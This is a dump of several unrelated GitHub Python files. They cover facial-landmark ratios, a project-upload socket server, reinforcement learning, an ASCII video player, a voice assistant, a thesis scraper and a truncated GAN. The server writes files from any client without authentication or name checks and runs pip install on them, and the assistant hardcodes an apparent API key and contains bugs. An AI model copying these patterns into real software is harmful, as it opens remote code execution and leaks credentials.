faceFeature):\n faceFeaturesCoordinates = getAllCoordinateFaceFeature(landmarks)\n centerFaceX = getCenterFaceX(landmarks)\n ratioFeatureList = []\n\n if faceFeature == FACE_FEATURES[0]:\n faceCoordinateIndex = 0\n\n elif faceFeature == FACE_FEATURES[1]:\n faceCoordinateIndex = 1\n\n elif faceFeature == FACE_FEATURES[2]:\n faceCoordinateIndex = 2\n\n elif faceFeature == FACE_FEATURES[3]:\n faceCoordinateIndex = 3\n\n elif faceFeature == FACE_FEATURES[4]:\n faceCoordinateIndex = 4\n\n elif faceFeature == FACE_FEATURES[5]:\n faceCoordinateIndex = 5\n\n leftFeatureCoordinate_X = faceFeaturesCoordinates[faceCoordinateIndex][0]\n leftFeatureCoordinate_Y = faceFeaturesCoordinates[faceCoordinateIndex][1]\n\n rightFeatureCoordinate_X = faceFeaturesCoordinates[faceCoordinateIndex][2]\n rightFeatureCoordinate_Y = faceFeaturesCoordinates[faceCoordinateIndex][3]\n\n for index in range(0, len(leftFeatureCoordinate_X)):\n leftPoint_X = leftFeatureCoordinate_X[index]\n leftPoint_Y = leftFeatureCoordinate_Y[index]\n\n rightPoint_X = rightFeatureCoordinate_X[index]\n rightPoint_Y = rightFeatureCoordinate_Y[index]\n\n centerPoint_Y = centerOfPoints([leftPoint_Y, rightPoint_Y])\n\n leftDistance = getDistance(leftPoint_X, leftPoint_Y, centerFaceX, centerPoint_Y)\n rightDistance = getDistance(rightPoint_X, rightPoint_Y, centerFaceX, centerPoint_Y)\n ratio = leftDistance / rightDistance\n ratio = round(ratio, 3)\n ratioFeatureList.append(ratio)\n\n return averageValue(ratioFeatureList)\n\n\ndef centerOfPoints(coordinates):\n sumOfCoordinates = 0\n\n for number in coordinates:\n sumOfCoordinates += number\n\n return sumOfCoordinates / len(coordinates)\n\n\ndef getCoordinateFaceFeature(feature, landmarks):\n leftCoordinateFeature_X = []\n leftCoordinateFeature_Y = []\n\n rightCoordinateFeature_X = []\n rightCoordinateFeature_Y = []\n\n coordinates = []\n\n if feature == \"jaw\":\n index_points_beginning = LEFT_JAW_POINTS[0]\n index_points_end = LEFT_JAW_POINTS[1]\n\n for point_index in range(index_points_beginning, index_points_end):\n pointCoordinate_X = landmarks.part(point_index).x\n pointCoordinate_Y = landmarks.part(point_index).y\n\n leftCoordinateFeature_X.append(pointCoordinate_X)\n leftCoordinateFeature_Y.append(pointCoordinate_Y)\n\n index_points_beginning = RIGHT_JAW_POINTS[0]\n index_points_end = RIGHT_JAW_POINTS[1]\n\n for point_index in range(index_points_beginning, index_points_end):\n pointCoordinate_X = landmarks.part(point_index).x\n pointCoordinate_Y = landmarks.part(point_index).y\n\n rightCoordinateFeature_X.append(pointCoordinate_X)\n rightCoordinateFeature_Y.append(pointCoordinate_Y)\n\n coordinates.append(leftCoordinateFeature_X)\n coordinates.append(leftCoordinateFeature_Y)\n\n coordinates.append(rightCoordinateFeature_X)\n coordinates.append(rightCoordinateFeature_Y)\n\n return coordinates\n\n if feature == \"eyes\":\n index_points_beginning = LEFT_EYE_POINTS[0]\n index_points_end = LEFT_EYE_POINTS[1]\n\n for point_index in range(index_points_beginning, index_points_end):\n pointCoordinate_X = landmarks.part(point_index).x\n pointCoordinate_Y = landmarks.part(point_index).y\n\n leftCoordinateFeature_X.append(pointCoordinate_X)\n leftCoordinateFeature_Y.append(pointCoordinate_Y)\n\n index_points_beginning = RIGHT_EYE_POINTS[0]\n index_points_end = RIGHT_EYE_POINTS[1]\n\n for point_index in range(index_points_beginning, index_points_end):\n pointCoordinate_X = landmarks.part(point_index).x\n pointCoordinate_Y = landmarks.part(point_index).y\n\n rightCoordinateFeature_X.append(pointCoordinate_X)\n rightCoordinateFeature_Y.append(pointCoordinate_Y)\n\n coordinates.append(leftCoordinateFeature_X)\n coordinates.append(leftCoordinateFeature_Y)\n\n coordinates.append(rightCoordinateFeature_X)\n coordinates.append(rightCoordinateFeature_Y)\n\n return coordinates\n\n if feature == \"eye_brows\":\n\n index_points_beginning = LEFT_EYEBROW_POINTS[0]\n index_points_end = LEFT_EYEBROW_POINTS[1]\n\n for point_index in range(index_points_beginning, index_points_end):\n pointCoordinate_X = landmarks.part(point_index).x\n pointCoordinate_Y = landmarks.part(point_index).y\n\n leftCoordinateFeature_X.append(pointCoordinate_X)\n leftCoordinateFeature_Y.append(pointCoordinate_Y)\n\n index_points_beginning = RIGHT_EYEBROW_POINTS[0]\n index_points_end = RIGHT_EYEBROW_POINTS[1]\n\n for point_index in range(index_points_beginning, index_points_end):\n pointCoordinate_X = landmarks.part(point_index).x\n pointCoordinate_Y = landmarks.part(point_index).y\n\n rightCoordinateFeature_X.append(pointCoordinate_X)\n rightCoordinateFeature_Y.append(pointCoordinate_Y)\n\n coordinates.append(leftCoordinateFeature_X)\n coordinates.append(leftCoordinateFeature_Y)\n\n coordinates.append(rightCoordinateFeature_X)\n coordinates.append(rightCoordinateFeature_Y)\n\n return coordinates\n\n if feature == \"nose\":\n\n index_points_beginning = LEFT_NOSE_POINTS[0]\n index_points_end = LEFT_NOSE_POINTS[1]\n\n for point_index in range(index_points_beginning, index_points_end):\n pointCoordinate_X = landmarks.part(point_index).x\n pointCoordinate_Y = landmarks.part(point_index).y\n\n leftCoordinateFeature_X.append(pointCoordinate_X)\n leftCoordinateFeature_Y.append(pointCoordinate_Y)\n\n index_points_beginning = RIGHT_NOSE_POINTS[0]\n index_points_end = RIGHT_NOSE_POINTS[1]\n\n for point_index in range(index_points_beginning, index_points_end):\n pointCoordinate_X = landmarks.part(point_index).x\n pointCoordinate_Y = landmarks.part(point_index).y\n\n rightCoordinateFeature_X.append(pointCoordinate_X)\n rightCoordinateFeature_Y.append(pointCoordinate_Y)\n\n coordinates.append(leftCoordinateFeature_X)\n coordinates.append(leftCoordinateFeature_Y)\n\n coordinates.append(rightCoordinateFeature_X)\n coordinates.append(rightCoordinateFeature_Y)\n\n return coordinates\n\n if feature == \"mouth\":\n\n for point_index in LEFT_MOUTH_POINTS:\n pointCoordinate_X = landmarks.part(point_index).x\n pointCoordinate_Y = landmarks.part(point_index).y\n\n leftCoordinateFeature_X.append(pointCoordinate_X)\n leftCoordinateFeature_Y.append(pointCoordinate_Y)\n\n for point_index in RIGHT_MOUTH_POINTS:\n pointCoordinate_X = landmarks.part(point_index).x\n pointCoordinate_Y = landmarks.part(point_index).y\n\n rightCoordinateFeature_X.append(pointCoordinate_X)\n rightCoordinateFeature_Y.append(pointCoordinate_Y)\n\n coordinates.append(leftCoordinateFeature_X)\n coordinates.append(leftCoordinateFeature_Y)\n\n coordinates.append(rightCoordinateFeature_X)\n coordinates.append(rightCoordinateFeature_Y)\n\n return coordinates\n\n if feature == \"lips\":\n\n for point_index in LEFT_LIPS_POINTS:\n pointCoordinate_X = landmarks.part(point_index).x\n pointCoordinate_Y = landmarks.part(point_index).y\n\n leftCoordinateFeature_X.append(pointCoordinate_X)\n leftCoordinateFeature_Y.append(pointCoordinate_Y)\n\n for point_index in RIGHT_LIPS_POINTS:\n pointCoordinate_X = landmarks.part(point_index).x\n pointCoordinate_Y = landmarks.part(point_index).y\n\n rightCoordinateFeature_X.append(pointCoordinate_X)\n rightCoordinateFeature_Y.append(pointCoordinate_Y)\n\n coordinates.append(leftCoordinateFeature_X)\n coordinates.append(leftCoordinateFeature_Y)\n\n coordinates.append(rightCoordinateFeature_X)\n coordinates.append(rightCoordinateFeature_Y)\n\n return coordinates\n\n\ndef averageValue(valueList):\n sumRatio = 0\n for ratio in valueList:\n sumRatio += ratio\n\n average = sumRatio / len(valueList)\n return round(average, 3)\n\n\ndef getCenterFaceX(landmarks):\n sumPoint = 0\n\n for pointIndex in SYMMETRY_LINE_POINTS:\n x = landmarks.part(pointIndex).x\n sumPoint += x\n\n return sumPoint / len(SYMMETRY_LINE_POINTS)\n\n\ndef getAllCoordinateFaceFeature(landmarks):\n leftCoordinateFeature_X = []\n leftCoordinateFeature_Y = []\n\n rightCoordinateFeature_X = []\n rightCoordinateFeature_Y = []\n\n COORDINATES_EYES = []\n COORDINATES_EYE_BROWS = []\n COORDINATES_NOSE = []\n COORDINATES_MOUTH = []\n COORDINATES_LIPS = []\n COORDINATES_JAW = []\n\n # coordinates of Jaws points\n COORDINATES_JAW = getCoordinateFaceFeature(FACE_FEATURES[0], landmarks)\n\n # Coordinates of Eyes points\n COORDINATES_EYES = getCoordinateFaceFeature(FACE_FEATURES[1], landmarks)\n\n # Coordinates of eye_brows points\n COORDINATES_EYE_BROWS = getCoordinateFaceFeature(FACE_FEATURES[2], landmarks)\n\n # Coordinates of Nose points\n COORDINATES_NOSE = getCoordinateFaceFeature(FACE_FEATURES[3], landmarks)\n\n # Coordinates of mouth points\n COORDINATES_MOUTH = getCoordinateFaceFeature(FACE_FEATURES[4], landmarks)\n\n # Coordinates of lips points\n COORDINATES_LIPS = getCoordinateFaceFeature(FACE_FEATURES[5], landmarks)\n\n faceFeaturesCoordinates = [COORDINATES_JAW, COORDINATES_EYES, COORDINATES_EYE_BROWS, COORDINATES_NOSE,\n COORDINATES_MOUTH, COORDINATES_LIPS]\n\n return faceFeaturesCoordinates\n\n\ndef emptyCoordinateList(list_x, list_y):\n list_x[:] = []\n list_y[:] = []\n\n\ndef percentageToScale(percentage, scaleLimit):\n scale = (percentage * scaleLimit) / 100\n\n return round(scale)\n\n\ndef percentageTo10(percentage):\n return percentageToScale(percentage, 10)\n\n\ndef showImage(image):\n cv2.imshow(\"Face\", mat=image)\n\n # Wait for a key press to exit\n cv2.waitKey(delay=0)\n\n # Close all windows\n cv2.destroyAllWindows()\n\n\ndef showImageTime(image, time):\n cv2.imshow(\"Picture\", mat=image)\n\n # Wait for a key press to exit\n cv2.waitKey(delay=time*1000)\n\n # Close all windows\n cv2.destroyAllWindows()\n\n# # Resize Image\n# resized = cv2.resize(image, (RESIZED_WIDTH, RESIZED_HEIGHT))\n\n# # Rotate image\n# image = cv2.rotate(image, cv2.ROTATE_90_CLOCKWISE)\n\n\n# # Other ways of rotating\n# rows, cols = image.shape[:2]\n# deg = 45\n\n\n# # (col/2,rows/2) is the center of rotation for the image\n# # M is the coordinates of the center\n# M = cv2.getRotationMatrix2D((cols/2, rows/2), deg, 1)\n# image = cv2.warpAffine(image, M, (cols, rows))\n\n# # Show image\n# plt.imshow(image)\n# plt.show()\n\n# Save image\n# cv2.imwrite(\"richardSavedTest.jpg\", image)\n","repo_name":"KennethSidibe/compare-ugliness","sub_path":"compareUgliness.py","file_name":"compareUgliness.py","file_ext":"py","file_size_in_byte":15630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"13016217307","text":"import os\nimport traceback\nfrom socket import socket, AF_INET, SOCK_STREAM\nfrom colorama import Fore\nfrom subprocess import Popen, PIPE\nimport shutil\n\n\nclass SendProject:\n def __init__(self, conn=None):\n self.PATH = 'C:\\\\Users\\\\akuzm\\\\PycharmProjects\\\\'\n self.projects = os.listdir(self.PATH)\n if conn is not None:\n self.conn = conn\n else:\n self.server = socket(AF_INET, SOCK_STREAM)\n self.server.bind(('', 5008))\n self.server.listen()\n self.conn, addr = self.server.accept()\n print('Connected to', conn, addr)\n\n def run(self):\n try:\n with self.conn:\n print(Fore.GREEN, 'Connection: ', str(self.conn), end='')\n print(Fore.RESET)\n self.conn.send('|'.join(self.projects).encode('utf-8'))\n otv = self.conn.recv(1024).decode('utf-8')\n if otv.split()[0] == 'new':\n self.PATH += otv.split()[1]\n os.makedirs(self.PATH)\n elif otv.split()[0] == 'save':\n self.send_zip(otv.split()[1])\n raise Exception\n else:\n self.PATH += otv\n files = self.conn.recv(1024).decode('utf-8').split('|')\n\n for file_name in files:\n file = self.receive_file()\n self.save_file(file, file_name)\n print(f'Save file - {file_name}\\n---------------------------')\n f_req = self.conn.recv(1024).decode('utf-8')\n if int(f_req):\n data = self.create_venv()\n else:\n data = 'Packages not installed'.encode('cp1125')\n self.conn.sendall(data)\n print(Fore.GREEN, 'OK')\n\n except Exception as ex:\n print(Fore.RED, traceback.format_exc(), ex, Fore.RESET)\n\n def receive_file(self):\n full_size = self.conn.recv(1024).decode('utf-8')\n self.conn.send(b' ')\n print(Fore.BLUE, full_size, Fore.RESET)\n full_size = int(full_size)\n size = 0\n file = b''\n while size < full_size:\n data = self.conn.recv(1024)\n size += len(data)\n file += data\n self.conn.send(b' ')\n return file\n\n def send_zip(self, branch):\n print('start create zip and send')\n path = 'D:\\\\server\\\\zip\\\\' + branch\n shutil.make_archive(path, 'zip', self.PATH + branch)\n print('zip created')\n size = os.path.getsize(path + '.zip')\n self.conn.send(str(size).encode('utf-8'))\n self.conn.recv(1)\n with open(path + '.zip', 'rb') as file:\n self.conn.sendall(file.read())\n os.remove(path + '.zip')\n print('OK')\n\n def save_file(self, data, file_name):\n s = file_name.split('\\\\\\\\')\n path = self.PATH + '\\\\\\\\'.join(s[:-1])\n print(path, 'path')\n\n if not os.path.exists(path):\n os.makedirs(path)\n\n with open(self.PATH + '\\\\' + file_name, 'wb') as file:\n file.write(data)\n\n def create_venv(self):\n command = f'cd {self.PATH}\\npip install -r requirements.txt\\npip list\\n'\n process = Popen(\"powershell.exe\", shell=False, stdin=PIPE, stdout=PIPE, stderr=PIPE, text=False)\n d1, d2 = process.communicate(command.encode('cp1125'))\n print('ok')\n return d1 + d2\n\n\nif __name__ == '__main__':\n server = SendProject()\n # server.PATH = server.PATH + 'super'\n # print(server.create_venv().decode('cp1125'))\n server.run()\n server.conn.close()\n","repo_name":"Aleksey3000/start_server","sub_path":"send/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14588514245","text":"import pygame\nimport time\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom RL_2_YuanyangForMC import YuanYangEnv\n\n\nclass MC_RL:\n def __init__(self, yuanyang):\n self.qvalue = np.zeros((len(yuanyang.states), len(yuanyang.actions))) * 0.1\n self.n = 0.001 * np.ones((len(yuanyang.states), len(yuanyang.actions)))\n self.actions = yuanyang.actions\n self.yuanyang = yuanyang\n self.gamma = yuanyang.gamma\n\n def greedy_policy(self, qfun, state):\n amax = qfun[state, :].argmax()\n return self.actions[amax]\n\n def epsilon_greedy_policy(self, qfun, state, epsilon):\n amax = qfun[state, :].argmax()\n if np.random.uniform() < 1 - epsilon:\n return self.actions[amax]\n else:\n return self.actions[int(random.random() * len(self.actions))]\n\n def find_anum(self, a):\n for i in range(len(self.actions)):\n if a == self.actions[i]:\n return i\n\n def mc_learning_ei(self, num_iter):\n yuanyang = self.yuanyang\n self.qvalue = np.zeros((len(yuanyang.states), len(yuanyang.actions)))\n self.n = 0.001 * np.ones((len(yuanyang.states), len(yuanyang.actions)))\n for iter1 in range(num_iter):\n s_sample = []\n a_sample = []\n r_sample = []\n s = self.yuanyang.reset()\n a = self.actions[int(random.random() * len(self.actions))]\n done = False\n step_num = 0\n\n if self.mc_test() == 1:\n print('探索初始化第一次完成任务需要的迭代次数:', iter1)\n break\n # 采集数据s0-a1-s1-a2-s2...terminate state\n while done == False and step_num < 30:\n s_next, r, done = self.yuanyang.transform(s, a)\n a_num = self.find_anum(a)\n # 往回走不合理,因此给予负数回报\n if s_next in s_sample:\n r = -10\n s_sample.append(s)\n a_sample.append(a_num)\n r_sample.append(r)\n step_num += 1\n s = s_next\n a = self.greedy_policy(self.qvalue, s)\n # 计算折扣累计回报\n # g(s_0)\n a = self.greedy_policy(self.qvalue, s)\n g = self.qvalue[s, self.find_anum(a)]\n for i in range(len(s_sample) - 1, -1, -1):\n g *= self.gamma\n g += r_sample[i]\n # g=G(s1,a)\n for i in range(len(s_sample)):\n self.n[s_sample[i], a_sample[i]] += 1.0\n self.qvalue[s_sample[i], a_sample[i]] = \\\n (self.qvalue[s_sample[i], a_sample[i]] * (self.n[s_sample[i],\n a_sample[i]] - 1) + g) / self.n[s_sample[i],\n a_sample[i]]\n g -= r_sample[i]\n g /= self.gamma\n return self.qvalue\n\n def mc_learning_on_policy(self,num_iter,epsilon):\n yuanyang = self.yuanyang\n self.qvalue = np.zeros((len(yuanyang.states), len(yuanyang.actions)))\n self.n = 0.001 * np.ones((len(yuanyang.states), len(yuanyang.actions)))\n for iter1 in range(num_iter):\n s_sample=[]\n r_sample=[]\n a_sample=[]\n s=0\n done=False\n step_num=0\n epsilon=epsilon*np.exp(-iter1/1000)\n while done == False and step_num < 30:\n a=self.epsilon_greedy_policy(self.qvalue, s, epsilon)\n s_next,r,done=yuanyang.transform(s,a)\n a_num=self.find_anum(a)\n # 往回走不合理,因此给予负数回报\n if s_next in s_sample:\n r = -2\n s_sample.append(s)\n a_sample.append(a_num)\n r_sample.append(r)\n step_num += 1\n s = s_next\n if self.mc_test() == 1:\n print('探索初始化第一次完成任务需要的迭代次数:', iter1)\n break\n a=self.epsilon_greedy_policy(self.qvalue,s,epsilon)\n g=self.qvalue[s,self.find_anum(a)]\n for i in range(len(s_sample)-1,-1,-1):\n g*=self.gamma\n g+=r_sample[i]\n\n for i in range(len(s_sample)):\n self.n[s_sample[i],a_sample[i]]+=1.0\n self.qvalue[s_sample[i],a_sample[i]]= \\\n (self.qvalue[s_sample[i], a_sample[i]] * (self.n[s_sample[i],\n a_sample[i]] - 1) + g) / self.n[s_sample[i],\n a_sample[i]]\n g -= r_sample[i]\n g /= self.gamma\n return self.qvalue\n\n def mc_test(self):\n s = 0\n s_sample = []\n done = False\n flag = 0\n step_num = 0\n while False == done and step_num < 30:\n a = self.greedy_policy(self.qvalue, s)\n s_next, r, done = self.yuanyang.transform(s, a)\n s_sample.append(s)\n s = s_next\n step_num += 1\n if s == 9:\n flag = 1\n return flag\n\n\nif __name__ == '__main__':\n yuanyang = YuanYangEnv()\n brain = MC_RL(yuanyang)\n qvalue1 = brain.mc_learning_on_policy(num_iter=5000,epsilon=0.7)\n yuanyang.action_value = qvalue1\n flag = 1\n s = 0\n step_num = 0\n path = []\n while flag:\n path.append(s)\n yuanyang.path = path\n a = brain.greedy_policy(qvalue1, s)\n print('%d -> %s' % (s, a), qvalue1[s, 0], qvalue1[s, 1], qvalue1[s, 2], qvalue1[s, 3])\n yuanyang.bird_male_position = yuanyang.state_to_position(s)\n yuanyang.render()\n time.sleep(0.2)\n step_num += 1\n s_, r, t = yuanyang.transform(s, a)\n if t == True or step_num > 30:\n flag = 0\n s = s_\n\n yuanyang.bird_male_position = yuanyang.state_to_position(s)\n path.append(s)\n yuanyang.render()\n while True:\n yuanyang.render()\n","repo_name":"309James/RL","sub_path":"RL_4_Monte_Carlo.py","file_name":"RL_4_Monte_Carlo.py","file_ext":"py","file_size_in_byte":6258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37797785950","text":"import argparse\nimport curses\nimport math\nimport time\nimport typing\n\nimport set_root_path # noqa\nfrom image2ascii.frame_converter import FrameConverter\n\nimport cv2\nimport numpy as np\nimport pafy\n\n\"\"\"\nTODO: clear terminal using ANSI codes for rewriting existing lines\n\"\"\"\n\nDELTA = 0.000001\n\n\nOUTPUT_WIDTHS_BY_LABEL = {\n \"XS\": 36,\n \"S\": 78,\n \"M\": 120,\n \"L\": 162,\n \"XL\": 204,\n \"XXL\": 246,\n \"XXXL\": 288}\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description='Play video in terminal as ascii frames.')\n parser.add_argument(\n 'source',\n type=str,\n help='\"webcam\" or youtube url')\n parser.add_argument(\n 'size',\n type=str,\n choices=list(OUTPUT_WIDTHS_BY_LABEL.keys()),\n help='output size')\n parser.add_argument(\n '--invert-brightness',\n '-i',\n dest='invert_brightness',\n action='store_const',\n const=True,\n default=False)\n parser.add_argument(\n '--flip-horizontally',\n '-f',\n dest='flip_horizontally',\n action='store_const',\n const=True,\n default=False)\n args = parser.parse_args()\n return args\n\n\ndef get_video_capture(source: str) -> cv2.VideoCapture:\n target_frame_duration: float\n target_framerate: int\n\n # get source stream\n if source == \"webcam\":\n video_capture = cv2.VideoCapture(0)\n else:\n vPafy = pafy.new(source)\n play = vPafy.getbest()\n video_capture = cv2.VideoCapture(play.url)\n return video_capture\n\n\ndef get_frame_index_for_time_elapsed(\n target_framerate: int, time_elapsed: float):\n \"\"\"\n Based on time elapsed and frame rate, figure out which frame we\n should be showing\n \"\"\"\n return math.floor(time_elapsed * target_framerate)\n\n\ndef play_video(\n video_capture: cv2.VideoCapture,\n window,\n downsample_factor: int) -> None:\n frame_converter = FrameConverter(\n downsample_factor=downsample_factor,\n window=window)\n\n # init timing variables\n target_framerate = round(video_capture.get(cv2.CAP_PROP_FPS))\n target_frame_duration = 1 / target_framerate\n last_frame_time: typing.Optional[float] = None\n this_frame_time: typing.Optional[float] = None\n\n # we start at frame 1 instead of 0 because we read the first\n # frame to get the video dimensions\n current_frame_index = 1\n video_start_time = time.time()\n\n # read from stream\n while (True):\n if args.source != \"webcam\":\n # For youtube, we try to show video at original speed\n time_elapsed = time.time() - video_start_time\n expected_frame_index = get_frame_index_for_time_elapsed(\n target_framerate, time_elapsed)\n if expected_frame_index > current_frame_index:\n frames_to_skip = expected_frame_index - current_frame_index\n for i in range(frames_to_skip):\n video_capture.read()\n current_frame_index = expected_frame_index\n elif expected_frame_index < current_frame_index:\n # we're running ahead: wait a bit and loop again\n time.sleep(target_frame_duration / 2)\n continue\n\n # display frame\n has_frame, frame = video_capture.read()\n if not has_frame:\n break\n current_frame_index += 1\n if args.flip_horizontally:\n frame = np.flip(frame, 1)\n rgb_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n ascii_frame = frame_converter.convert_frame_to_ascii(\n rgb_frame, invert_brightness=args.invert_brightness)\n frame_converter.print_frame(ascii_frame)\n\n # display performance stats\n last_frame_time = this_frame_time\n this_frame_time = time.time()\n time_elapsed = this_frame_time - video_start_time\n duration = (\n this_frame_time - last_frame_time\n if last_frame_time is not None else None)\n actual_framerate = (\n round(1 / (duration + DELTA))\n if duration is not None\n else target_framerate)\n window.addstr(f\"\\nFramerate: {actual_framerate}fps\")\n window.addstr(\"\\n<Press any key to exit>\")\n window.refresh()\n char = window.getch()\n if char != -1:\n break\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n video_capture = get_video_capture(args.source)\n has_frame, frame = video_capture.read()\n original_width = frame.shape[1]\n output_width = OUTPUT_WIDTHS_BY_LABEL[args.size]\n downsample_factor = math.ceil(original_width / output_width)\n output_height = int(frame.shape[0] / downsample_factor)\n\n # setup window with hidden cursor\n w = curses.initscr()\n w.nodelay(1)\n curses.curs_set(0)\n\n error = None\n try:\n play_video(video_capture, w, downsample_factor)\n except Exception as e:\n error = e\n w.erase()\n w.refresh()\n curses.endwin()\n if error is not None:\n print(\n \"Encountered error: most likely, the window is too small \"\n \"for the output size selected.\")\n","repo_name":"drigberg/image2ascii","sub_path":"commands/play_video.py","file_name":"play_video.py","file_ext":"py","file_size_in_byte":5151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7972513104","text":"import speech_recognition as sr\nimport pyttsx3\nimport pywhatkit\nimport urllib\nimport json\nimport datetime\nimport wikipedia\n\nname='viernes'\nkey = 'AIzaSyBDyz2d1BqOmobH47FOi1-dbtPy0H-dnp8'\nflag = 1\nlistener = sr.Recognizer()\n\nengine = pyttsx3.init()\n\nvoices = engine.getProperty('voices')\nengine.setProperty('voice',voices[0].id)\nengine.setProperty('rate',178)\nengine.setProperty('volume',1)\n\ndef talk(text):\n engine.say(text)\n engine.runAndWait()\n\ndef listen():\n flag = 1\n try:\n with sr.Microphone() as source:\n print(\"Escuchando...\")\n voice=listener.listen(source)\n rec = listener.recognize_google(voice,language='es-ES')\n rec = rec.lower()\n \n if name in rec:\n rec = rec.replace(name, '')\n flag = run(rec)\n else:\n talk(\"Vuelve a intentarlo, no reconozco: \" + rec)\n except:\n pass\n return flag\n\ndef run():\n \n if 'reproduce' in rec:\n music = rec.replace('reproduce', '')\n talk('Reproduciendo '+music)\n pywhatkit.playonyt(music)\n elif 'Cuantos suscriptores tiene' in rec:\n name_subs = rec.replace('Cuantos suscriptores tiene', '')\n data = urllib.request.urlopen('https://www.googleapis.com/youtube/v3/channels?part=statistics&forUsername='+ name_subs + '&key=' + key).read()\n subs = json.loads(data)[\"items\"][0][\"statistics\"][\"subscriberCount\"]\n talk(name_subs+\"tiene {:,d}\".format(int(subs))+\" subscriptores!\") \n elif 'hora' in rec:\n hora = datetime.datetime().now().strftime('%I:%M %p')\n talk(\"Son las \"+hora)\n elif 'busca' in rec:\n order = rec.replace('busca', '')\n info = wikipedia.summary(order,1)\n talk(info)\n elif 'exit' in rec:\n flag = 0\n talk(\"Saliendo...\")\n else:\n talk(\"Vuelve a intentarlo,no reconozco: \"+rect)\n return flag\n \nwhile flag:\n flag = listen()","repo_name":"androx999/Viernes-AsistenteVirutal","sub_path":"Viernes.py","file_name":"Viernes.py","file_ext":"py","file_size_in_byte":1993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43249988176","text":"import pandas as pd\nfrom requests_html import HTMLSession\nsession = HTMLSession()\n\n# scrapear tesis de 3 carreras de 3 universidades\ncarreras = {\n 'ucv_psicología': 'https://repositorio.ucv.edu.pe/handle/20.500.12692/42194',\n # 'ucv_ciencias de la comunicación': 'https://repositorio.ucv.edu.pe/handle/20.500.12692/42449',\n 'ucv_contabilidad': 'https://repositorio.ucv.edu.pe/handle/20.500.12692/42301',\n #'uss_psicología': 'https://repositorio.uss.edu.pe/handle/20.500.12802/785',\n #'uss_ciencias de la comunicación': 'https://repositorio.uss.edu.pe/handle/20.500.12802/786',\n #'uss_contabilidad': 'https://repositorio.uss.edu.pe/handle/20.500.12802/663',\n #'autonoma_psicología': 'https://repositorio.autonoma.edu.pe/handle/20.500.13067/59',\n #'autonoma_contabilidad': 'https://repositorio.autonoma.edu.pe/handle/20.500.13067/61',\n # no disponible\n #'autonoma_ciencias de la comunicación': '',\n}\n\nd = []\nfor carrera, url_carrera in carreras.items():\n university = carrera.split('_')[0]\n career = carrera.split('_')[1]\n for page in range(50):\n try:\n r = session.get(f'{url_carrera}/discover?rpp=10&etal=0&group_by=none&page={page}&filtertype_0=dateIssued&filter_relational_operator_0=equals&filter_0=%5B2020+TO+2021%5D')\n containers = r.html.find('.ds-artifact-item')\n for container in containers:\n # PDF\n img = container.xpath('//img')[0]\n img_src = img.attrs['src'].split('.jpg')[0]\n pdf_src = f'https://repositorio.{university}.edu.pe' + img_src\n # TITULO\n title = container.xpath('//a')[1].text\n # RESUMEN\n abstract = container.find('.abstract')[0].text\n # AUTOR\n autor = container.find('.author')[0].text\n # AÑO\n year = container.find('.date')[0].text.split('-')[0]\n d.append(\n {\n 'UNIVERSIDAD': university,\n 'CARRERA': career,\n 'TITULO': title,\n 'RESUMEN': abstract,\n 'AUTOR(ES)': autor,\n 'AÑO': year,\n 'PDF': pdf_src\n }\n )\n except:\n continue\ndf = pd.DataFrame(d)\ndf.to_csv('base_datos_tesis2.csv')","repo_name":"annaabsi/tesis-scraping","sub_path":"tesis_scraping.py","file_name":"tesis_scraping.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"74671895520","text":"import torch\nimport torch.nn as nn\n\nclass Generator(nn.Module):\n \"\"\"\n generator model. takes a 100 length array (random noise) as input, and does the following:\n FC to 7x7x256\n reshape to (7, 7, 256)\n conv2dtranspose (deconvolution) multiple times to get to (28, 28, 1)\n \"\"\"\n def __init__(self, noise_dim=100):\n super().__init__()\n\n self.fc1 = nn.Linear(noise_dim, 7*7*256)\n self.batchnorm1 = nn.BatchNorm1d(7*7*256)\n self.leakyrelu1 = nn.LeakyReLU()\n\n self.conv2dtranspose2 = nn.ConvTranspose2d(in_channels=256, out_channels=128, kernel_size=(5, 5), stride=(1, 1),\n padding=2, bias=False, dilation=1)\n self.batchnorm2 = nn.BatchNorm2d(128)\n self.leakyrelu2 = nn.LeakyReLU()\n\n self.conv2dtranspose3 = nn.ConvTranspose2d(in_channels=128, out_channels=64, kernel_size=(5, 5), stride=(2, 2),\n padding=2, bias=False, output_padding=1)\n self.batchnorm3 = nn.BatchNorm2d(64)\n self.leakyrelu3 = nn.LeakyReLU()\n\n self.conv2dtranspose4 = nn.ConvTranspose2d(in_channels=64, out_channels=1, kernel_size=(5, 5), stride=(2, 2),\n padding=2, bias=False, output_padding=1)\n\n self.tanh = nn.Tanh()\n\n def forward(self, x):\n x = self.fc1(x)\n x = self.batchnorm1(x)\n x = self.leakyrelu1(x)\n # [N, 12544]\n x = x.view((-1, 256, 7, 7))\n # [N, 256, 7, 7]\n x = self.conv2dtranspose2(x)\n x = self.batchnorm2(x)\n x = self.leakyrelu2(x)\n # [N, 128, 7, 7]\n x = self.conv2dtranspose3(x)\n x = self.batchnorm3(x)\n x = self.leakyrelu3(x)\n # [N, 64, 14, 14]\n x = self.conv2dtranspose4(x)\n # [N, 1, 28, 28]\n x = self.tanh(x)\n\n return x\n\nclass Discriminator(nn.Module):\n \"\"\"\n The discriminator model is a model which tries to classify inputs as either real or generated, using a CNN\n We will use binary_cross_entropy_from_logits, so this module returns logits\n \"\"\"\n def __init__(self):\n super().__init__()\n\n self.conv1 = nn.Conv2d(in_channels=1, out_channels=64, kernel_size=(5, 5), stride=(2, 2), padding=2)\n self.leakyrelu1 = nn.LeakyReLU()\n self.dropout1 = nn.Dropout(0.3)\n\n self.conv2 = nn.Conv2d(in_channels=64, out_channels=128, kernel_size=(5, 5), stride=(2, 2), padding=2)\n 